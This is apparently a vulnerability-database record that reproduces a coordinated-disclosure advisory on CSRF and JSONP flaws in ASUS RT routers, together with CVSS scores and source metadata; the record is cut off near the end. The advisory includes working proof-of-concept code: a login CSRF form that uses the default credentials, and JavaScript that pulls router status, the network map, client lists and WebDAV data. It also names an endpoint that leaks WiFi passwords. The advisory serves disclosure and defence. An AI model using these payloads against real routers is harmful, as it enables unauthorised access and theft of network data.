var-201705-3167
Vulnerability from variot
ASUS RT-AC and RT-N devices with firmware before 3.0.0.4.380.7378 allow JSONP Information Disclosure such as a network map. ASUS RT-AC and RT-N are two router products. Attackers can exploit vulnerabilities to obtain sensitive information. [Original post here: https://wwws.nightwatchcybersecurity.com/2017/05/09/multiple-vulnerabilities-in-asus-routers/]
Summary
Various models of ASUS RT routers have several CSRF vulnerabilities allowing malicious sites to login and change settings in the router; multiple JSONP vulnerabilities allowing exfiltration of router data and an XML endpoint revealing WiFi passwords. One issue (JSONP information disclosure) remains unfixed since the vendor doesn't consider it to be a security threat. CVE-2017-5891 has been assigned to the CSRF issues, and CVE-2017-5892 to cover the non-CSRF issues.
Vulnerability Details
RT routers from ASUS like many other routers come with a built-in web interface accessible over the local network but normally not accessible via the Internet. We discovered multiple issues within that web interface that would can facilitate attacks on the router either via a malicious site visited by a user on the same network, or a malicious mobile or desktop application running on the same network. For the CSRF vulnerabilities, a user would need to visit a malicious site which can try to login and change settings. For the JSONP vulnerabilities, a website can load the JSONP endpoints via SCRIPT tags as long as matching function name is defined on that site. The XML endpoint requires a mobile or desktop application to exploit. NOTE: all of these assume that the attacker knows the local IP address of the router. This could probably be guessed or be determined via Javascript APIs like WebRTC. For desktop and mobile applications, determination of the gateway address should be trivial to implement.
Issue #1 - Login Page CSRF
The login page for the router doesn't have any kind of CSRF protection, thus allowing a malicious website to submit a login request to the router without the user's knowledge. Obviously, this only works if the site either knows the username and password of the router OR the user hasn't changed the default credentials ("admin / admin"). To exploit, submit the base-64 encoded username and password as "login_authorization" form post, to the "/login.cgi" URL of the browser.
Example of a form that can exploit this issue (uses default credentials):
Issue #2 - Save Settings CSRF
The various pages within the interface that can save settings do not have CSRF protection. That means that a malicious site, once logged in as described above would be able to change any settings in the router without the user's knowledge. No login is required to the router. The vendor doesn't consider these endpoints a security threat.
The endpoints are as follows:
/findasus.json
Returns the router model name, SSID name and the local IP address of the router
iAmAlive([{model?Name: "XXX", ssid: "YYY", ipAddr: "ZZZZ"}])
/httpd_check.json
Returns: {"alive": 1, "isdomain": 0}
Exploit code as follows:
function iAmAlive(payload) { window.alert("Result returned: " + JSON.stringify(payload)); } function alert1() { var script = document.createElement('script'); script.src = 'http://192.168.1.1/findasus.json' document.getElementsByTagName('head')[0].appendChild(script); } function alert2() { var script = document.createElement('script'); script.src = 'http://192.168.1.1/httpd_check.json' document.getElementsByTagName('head')[0].appendChild(script); }
Issue #4 - JSONP Information Disclosure, Login Required
There exist multiple JSONP endpoints within the router interface that reveal various data from the router including.
Below is a list of endpoints and exploit code:
/status.asp - Network Information
function getstatus() { var script = document.createElement('script'); script.src = 'http://192.168.1.1/status.asp' document.getElementsByTagName('head')[0].appendChild(script); } function show_wanlink_info() { var obj = {}; obj.status = wanlink_status(); obj.statusstr = wanlink_statusstr(); obj.wanlink_type = wanlink_type(); obj.wanlink_ipaddr = wanlink_ipaddr(); obj.wanlink_xdns = wanlink_xdns(); window.alert(JSON.stringify(obj)); }
Load Status script
Show wanlink info
/wds_aplist_2g.asp - Surrounding Access points, 2.4 Ghz band
/wds_aplist_5g.asp - Surrounding Access points, 5 Ghz band
function getwds_2g() { var script = document.createElement('script'); script.src = 'http://192.168.1.1/wds_aplist_2g.asp' document.getElementsByTagName('head')[0].appendChild(script); } function getwds_5g() { var script = document.createElement('script'); script.src = 'http://192.168.1.1/wds_aplist_5g.asp' document.getElementsByTagName('head')[0].appendChild(script); }
Load 2G info
Load 5G info
Show AP info
/update_networkmapd.asp - Network map of devices on the network
function getmap() { var script = document.createElement('script'); script.src = 'http://192.168.1.1/update_networkmapd.asp' document.getElementsByTagName('head')[0].appendChild(script); }
Load Network map
Show
Map
/update_clients.asp - Origin data
function getorigin() { originData = []; var script = document.createElement('script'); script.src = 'http://192.168.1.1/update_clients.asp' document.getElementsByTagName('head')[0].appendChild(script); }
Load Origin
Show Origin
/get_real_ip.asp - External IP address
function getrealip() { var script = document.createElement('script'); script.src = 'http://192.168.1.1/get_real_ip.asp' document.getElementsByTagName('head')[0].appendChild(script); }
Load IP
Show IP
/get_webdavInfo.asp - WebDAV information
function getwebdav() { var script = document.createElement('script'); script.src = 'http://192.168.1.1/get_webdavInfo.asp'; document.getElementsByTagName('head')[0].appendChild(script); }
Load WebDav
Show Info 1
Show Info 1
Issue #5 - XML Endpoint Reveals WiFi Passwords
An XML endpoint exists in the router which reveals the WiFi password to the router but to fully exploit this issue, it would require a mobile or desktop application running on the local network since XML cannot be loaded cross origin in the browser. This endpoint can be accessed at the following URL and requires login:
[router IP]/WPS_info.xml
Mitigation Steps / Vendor Response
Users should change the default credentials and apply the latest firmware released by ASUS, version v3.0.0.4.380.7378 or higher.
Affected models include the following ASUS routers:
RT-AC55U RT-AC56R RT-AC56S RT-AC56U RT-AC66U RT-AC88U RT-AC66R RT-AC66U RT-AC66W RT-AC68W RT-AC68P RT-AC68R RT-AC68U RT-AC87R RT-AC87U RT-AC51U RT-AC53U RT-AC1900P RT-AC3100 RT-AC3200 RT-AC5300 RT-N11P RT-N12 (D1 version only) RT-N12+ RT-N12E RT-N18U RT-N56U RT-N66R RT-N66U (B1 version only) RT-N66W
References
CVE-IDs: CVE-2017-5891 and CVE-2017-5892 CERT/CC Tracking # VR-627
Credits
We would like to thank CERT/CC for helping to coordinate the disclosure process. This advisory was written by Yakov Shafranovich.
Timeline
2017-01-21: Initial contact with the vendor 2017-01-23: Initial contact with CERT/CC 2017-02-05: Vulnerability details and POC code provided to the vendor, CVEs requested 2017-02-10: Vulnerability analysis received from the vendor 2017-02-12: Beta firmware provided by the firmware to test fixes 2017-02-12: Vendor fixes confirmed 2017-03-31: Fixed firmware released publicly by the vendor 2017-05-01: Draft advisory shared with the vendor and CERT/CC 2017-05-09: Public disclosure
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201705-3167",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rt-ac1750",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.4.380.7266"
},
{
"model": "rt-ac1750",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-ac*",
"scope": "lt",
"trust": 0.6,
"vendor": "asus",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-n",
"scope": "eq",
"trust": 0.6,
"vendor": "asus",
"version": "*\u003c3.0.0.4.380.7378"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-06425"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003777"
},
{
"db": "CNNVD",
"id": "CNNVD-201705-571"
},
{
"db": "NVD",
"id": "CVE-2017-5892"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:asus:rt-ac1750_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-003777"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Yakov Shafranovich",
"sources": [
{
"db": "PACKETSTORM",
"id": "142460"
}
],
"trust": 0.1
},
"cve": "CVE-2017-5892",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2017-5892",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2017-06425",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-114095",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2017-5892",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-5892",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2017-5892",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2017-06425",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201705-571",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-114095",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2017-5892",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-06425"
},
{
"db": "VULHUB",
"id": "VHN-114095"
},
{
"db": "VULMON",
"id": "CVE-2017-5892"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003777"
},
{
"db": "CNNVD",
"id": "CNNVD-201705-571"
},
{
"db": "NVD",
"id": "CVE-2017-5892"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ASUS RT-AC* and RT-N* devices with firmware before 3.0.0.4.380.7378 allow JSONP Information Disclosure such as a network map. ASUS RT-AC* and RT-N* are two router products. Attackers can exploit vulnerabilities to obtain sensitive information. [Original post here:\nhttps://wwws.nightwatchcybersecurity.com/2017/05/09/multiple-vulnerabilities-in-asus-routers/]\n\nSummary\n\nVarious models of ASUS RT routers have several CSRF vulnerabilities\nallowing malicious sites to login and change settings in the router;\nmultiple JSONP vulnerabilities allowing exfiltration of router data\nand an XML endpoint revealing WiFi passwords. One issue (JSONP information disclosure) remains\nunfixed since the vendor doesn\u0027t consider it to be a security threat. \nCVE-2017-5891 has been assigned to the CSRF issues, and CVE-2017-5892\nto cover the non-CSRF issues. \n\nVulnerability Details\n\nRT routers from ASUS like many other routers come with a built-in web\ninterface accessible over the local network but normally not\naccessible via the Internet. We discovered multiple issues within that\nweb interface that would can facilitate attacks on the router either\nvia a malicious site visited by a user on the same network, or a\nmalicious mobile or desktop application running on the same network. \nFor the CSRF vulnerabilities, a user would need to visit a malicious\nsite which can try to login and change settings. For the JSONP\nvulnerabilities, a website can load the JSONP endpoints via SCRIPT\ntags as long as matching function name is defined on that site. The\nXML endpoint requires a mobile or desktop application to exploit. \nNOTE: all of these assume that the attacker knows the local IP address\nof the router. This could probably be guessed or be determined via\nJavascript APIs like WebRTC. For desktop and mobile applications,\ndetermination of the gateway address should be trivial to implement. \n\nIssue #1 - Login Page CSRF\n\nThe login page for the router doesn\u0027t have any kind of CSRF\nprotection, thus allowing a malicious website to submit a login\nrequest to the router without the user\u0027s knowledge. Obviously, this\nonly works if the site either knows the username and password of the\nrouter OR the user hasn\u0027t changed the default credentials (\"admin /\nadmin\"). To exploit, submit the base-64 encoded username and password\nas \"login_authorization\" form post, to the \"/login.cgi\" URL of the\nbrowser. \n\nExample of a form that can exploit this issue (uses default credentials):\n\n\u003cform action=\"http://192.168.1.1/login.cgi\"\n method=\"post\" target=\"_blank\"\u003e\n\u003cinput name=\"login_authorization\" type=\"text\"\n value=\"YWRtaW46YWRtaW4=\" /\u003e\n\u003cinput type=\"submit\" /\u003e\u003c/form\u003e\n\nIssue #2 - Save Settings CSRF\n\nThe various pages within the interface that can save settings do not\nhave CSRF protection. That means that a malicious site, once logged in\nas described above would be able to change any settings in the router\nwithout the user\u0027s knowledge. No login\nis required to the router. The vendor doesn\u0027t consider these endpoints\na security threat. \n\nThe endpoints are as follows:\n\n/findasus.json\n\nReturns the router model name, SSID name and the local IP address of the router\n\niAmAlive([{model?Name: \"XXX\", ssid: \"YYY\", ipAddr: \"ZZZZ\"}])\n\n/httpd_check.json\n\nReturns: {\"alive\": 1, \"isdomain\": 0}\n\nExploit code as follows:\n\nfunction iAmAlive(payload) {\n window.alert(\"Result returned: \" + JSON.stringify(payload));\n}\nfunction alert1() {\n var script = document.createElement(\u0027script\u0027);\n script.src = \u0027http://192.168.1.1/findasus.json\u0027\n document.getElementsByTagName(\u0027head\u0027)[0].appendChild(script);\n}\nfunction alert2() {\n var script = document.createElement(\u0027script\u0027);\n script.src = \u0027http://192.168.1.1/httpd_check.json\u0027\n document.getElementsByTagName(\u0027head\u0027)[0].appendChild(script);\n}\n\nIssue #4 - JSONP Information Disclosure, Login Required\n\nThere exist multiple JSONP endpoints within the router interface that\nreveal various data from the router including. \n\nBelow is a list of endpoints and exploit code:\n\n/status.asp - Network Information\n\nfunction getstatus() {\n var script = document.createElement(\u0027script\u0027);\n script.src = \u0027http://192.168.1.1/status.asp\u0027\n document.getElementsByTagName(\u0027head\u0027)[0].appendChild(script);\n}\nfunction show_wanlink_info() {\n var obj = {};\n obj.status = wanlink_status();\n obj.statusstr = wanlink_statusstr();\n obj.wanlink_type = wanlink_type();\n obj.wanlink_ipaddr = wanlink_ipaddr();\n obj.wanlink_xdns = wanlink_xdns();\n window.alert(JSON.stringify(obj));\n}\n\n\u003cbr/\u003e\n\u003cbutton onClick=\"getstatus()\"\u003eLoad Status script\u003c/button\u003e\n\u003cbutton onClick=\"show_wanlink_info()\"\u003eShow wanlink info\u003c/button\u003e\n\u003cbr/\u003e\u003cbr/\u003e\n\n/wds_aplist_2g.asp - Surrounding Access points, 2.4 Ghz band\n\n/wds_aplist_5g.asp - Surrounding Access points, 5 Ghz band\n\n\nfunction getwds_2g() {\n var script = document.createElement(\u0027script\u0027);\n script.src = \u0027http://192.168.1.1/wds_aplist_2g.asp\u0027\n document.getElementsByTagName(\u0027head\u0027)[0].appendChild(script);\n}\nfunction getwds_5g() {\n var script = document.createElement(\u0027script\u0027);\n script.src = \u0027http://192.168.1.1/wds_aplist_5g.asp\u0027\n document.getElementsByTagName(\u0027head\u0027)[0].appendChild(script);\n}\n\n\u003cbr/\u003e\n\u003cbutton onClick=\"getwds_2g()\"\u003eLoad 2G info\u003c/button\u003e\n\u003cbutton onClick=\"getwds_5g()\"\u003eLoad 5G info\u003c/button\u003e\n\u003cbutton onClick=\"window.alert(JSON.stringify(wds_aplist))\"\u003eShow AP info\u003c/button\u003e\n\u003cbr/\u003e\u003cbr/\u003e\n\n/update_networkmapd.asp - Network map of devices on the network\n\nfunction getmap() {\n var script = document.createElement(\u0027script\u0027);\n script.src = \u0027http://192.168.1.1/update_networkmapd.asp\u0027\n document.getElementsByTagName(\u0027head\u0027)[0].appendChild(script);\n}\n\n\u003cbr/\u003e\n\u003cbutton onClick=\"getmap()\"\u003eLoad Network map\u003c/button\u003e\n\u003cbutton onClick=\"window.alert(JSON.stringify(fromNetworkmapd))\"\u003eShow\nMap\u003c/button\u003e\n\u003cbr/\u003e\u003cbr/\u003e\n\n/update_clients.asp - Origin data\n\nfunction getorigin() {\n originData = [];\n var script = document.createElement(\u0027script\u0027);\n script.src = \u0027http://192.168.1.1/update_clients.asp\u0027\n document.getElementsByTagName(\u0027head\u0027)[0].appendChild(script);\n}\n\n\u003cbr/\u003e\n\u003cbutton onClick=\"getorigin()\"\u003eLoad Origin\u003c/button\u003e\n\u003cbutton onClick=\"window.alert(JSON.stringify(originData))\"\u003eShow Origin\u003c/button\u003e\n\n/get_real_ip.asp - External IP address\n\nfunction getrealip() {\n var script = document.createElement(\u0027script\u0027);\n script.src = \u0027http://192.168.1.1/get_real_ip.asp\u0027\n document.getElementsByTagName(\u0027head\u0027)[0].appendChild(script);\n}\n\n\u003cbr/\u003e\n\u003cbutton onClick=\"getrealip()\"\u003eLoad IP\u003c/button\u003e\n\u003cbutton onClick=\"window.alert(JSON.stringify(wan0_realip_ip))\"\u003eShow IP\u003c/button\u003e\n\n/get_webdavInfo.asp - WebDAV information\n\nfunction getwebdav() {\n var script = document.createElement(\u0027script\u0027);\n script.src = \u0027http://192.168.1.1/get_webdavInfo.asp\u0027;\n document.getElementsByTagName(\u0027head\u0027)[0].appendChild(script);\n}\n\n\u003cbr/\u003e\n\u003cbutton onClick=\"getwebdav()\"\u003eLoad WebDav\u003c/button\u003e\n\u003cbutton onClick=\"window.alert(JSON.stringify(pktInfo))\"\u003eShow Info 1\u003c/button\u003e\n\u003cbutton onClick=\"window.alert(JSON.stringify(webdavInfo))\"\u003eShow Info 1\u003c/button\u003e\n\u003cbr/\u003e\u003cbr/\u003e\n\nIssue #5 - XML Endpoint Reveals WiFi Passwords\n\nAn XML endpoint exists in the router which reveals the WiFi password\nto the router but to fully exploit this issue, it would require a\nmobile or desktop application running on the local network since XML\ncannot be loaded cross origin in the browser. This endpoint can be\naccessed at the following URL and requires login:\n\n[router IP]/WPS_info.xml\n\nMitigation Steps / Vendor Response\n\nUsers should change the default credentials and apply the latest\nfirmware released by ASUS, version v3.0.0.4.380.7378 or higher. \n\nAffected models include the following ASUS routers:\n\nRT-AC55U\nRT-AC56R\nRT-AC56S\nRT-AC56U\nRT-AC66U\nRT-AC88U\nRT-AC66R\nRT-AC66U\nRT-AC66W\nRT-AC68W\nRT-AC68P\nRT-AC68R\nRT-AC68U\nRT-AC87R\nRT-AC87U\nRT-AC51U\nRT-AC53U\nRT-AC1900P\nRT-AC3100\nRT-AC3200\nRT-AC5300\nRT-N11P\nRT-N12 (D1 version only)\nRT-N12+\nRT-N12E\nRT-N18U\nRT-N56U\nRT-N66R\nRT-N66U (B1 version only)\nRT-N66W\n\nReferences\n\nCVE-IDs: CVE-2017-5891 and CVE-2017-5892\nCERT/CC Tracking # VR-627\n\nCredits\n\nWe would like to thank CERT/CC for helping to coordinate the\ndisclosure process. This advisory was written by Yakov Shafranovich. \n\nTimeline\n\n2017-01-21: Initial contact with the vendor\n2017-01-23: Initial contact with CERT/CC\n2017-02-05: Vulnerability details and POC code provided to the vendor,\nCVEs requested\n2017-02-10: Vulnerability analysis received from the vendor\n2017-02-12: Beta firmware provided by the firmware to test fixes\n2017-02-12: Vendor fixes confirmed\n2017-03-31: Fixed firmware released publicly by the vendor\n2017-05-01: Draft advisory shared with the vendor and CERT/CC\n2017-05-09: Public disclosure\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-5892"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003777"
},
{
"db": "CNVD",
"id": "CNVD-2017-06425"
},
{
"db": "VULHUB",
"id": "VHN-114095"
},
{
"db": "VULMON",
"id": "CVE-2017-5892"
},
{
"db": "PACKETSTORM",
"id": "142460"
}
],
"trust": 2.43
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-5892",
"trust": 3.3
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003777",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201705-571",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-06425",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-114095",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2017-5892",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "142460",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-06425"
},
{
"db": "VULHUB",
"id": "VHN-114095"
},
{
"db": "VULMON",
"id": "CVE-2017-5892"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003777"
},
{
"db": "PACKETSTORM",
"id": "142460"
},
{
"db": "CNNVD",
"id": "CNNVD-201705-571"
},
{
"db": "NVD",
"id": "CVE-2017-5892"
}
]
},
"id": "VAR-201705-3167",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-06425"
},
{
"db": "VULHUB",
"id": "VHN-114095"
}
],
"trust": 1.5518518666666665
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-06425"
}
]
},
"last_update_date": "2024-11-23T22:34:38.901000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Driver \u0026 Tools",
"trust": 0.8,
"url": "https://www.asus.com/support/Download/11/2/0/161/45/"
},
{
"title": "Patch for ASUS RT-AC* and RT-N* Information Disclosure Vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/93553"
},
{
"title": "ASUS RT-AC* and RT-N* Repair measures for device security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=70068"
},
{
"title": "IoT_PoC_List",
"trust": 0.1,
"url": "https://github.com/hyoin97/IoT_PoC_List "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-06425"
},
{
"db": "VULMON",
"id": "CVE-2017-5892"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003777"
},
{
"db": "CNNVD",
"id": "CNNVD-201705-571"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-114095"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003777"
},
{
"db": "NVD",
"id": "CVE-2017-5892"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "https://wwws.nightwatchcybersecurity.com/2017/05/09/multiple-vulnerabilities-in-asus-routers/"
},
{
"trust": 1.1,
"url": "https://www.asus.com/support/download/11/2/0/161/45/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-5892"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-5892"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/httpd_check.json\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/update_clients.asp\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/status.asp\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/update_networkmapd.asp\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wds_aplist_2g.asp\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/get_real_ip.asp\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/findasus.json\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-5891"
},
{
"trust": 0.1,
"url": "https://wwws.nightwatchcybersecurity.com/2017/05/09/multiple-vulnerabilities-in-asus-routers/]"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/get_webdavinfo.asp\u0027;"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/wds_aplist_5g.asp\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/login.cgi\""
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-06425"
},
{
"db": "VULHUB",
"id": "VHN-114095"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003777"
},
{
"db": "PACKETSTORM",
"id": "142460"
},
{
"db": "CNNVD",
"id": "CNNVD-201705-571"
},
{
"db": "NVD",
"id": "CVE-2017-5892"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-06425"
},
{
"db": "VULHUB",
"id": "VHN-114095"
},
{
"db": "VULMON",
"id": "CVE-2017-5892"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003777"
},
{
"db": "PACKETSTORM",
"id": "142460"
},
{
"db": "CNNVD",
"id": "CNNVD-201705-571"
},
{
"db": "NVD",
"id": "CVE-2017-5892"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-05-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-06425"
},
{
"date": "2017-05-10T00:00:00",
"db": "VULHUB",
"id": "VHN-114095"
},
{
"date": "2017-05-10T00:00:00",
"db": "VULMON",
"id": "CVE-2017-5892"
},
{
"date": "2017-06-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-003777"
},
{
"date": "2017-05-10T22:22:22",
"db": "PACKETSTORM",
"id": "142460"
},
{
"date": "2017-05-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201705-571"
},
{
"date": "2017-05-10T05:29:00.220000",
"db": "NVD",
"id": "CVE-2017-5892"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-05-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-06425"
},
{
"date": "2017-05-16T00:00:00",
"db": "VULHUB",
"id": "VHN-114095"
},
{
"date": "2017-05-16T00:00:00",
"db": "VULMON",
"id": "CVE-2017-5892"
},
{
"date": "2017-06-07T00:00:00",
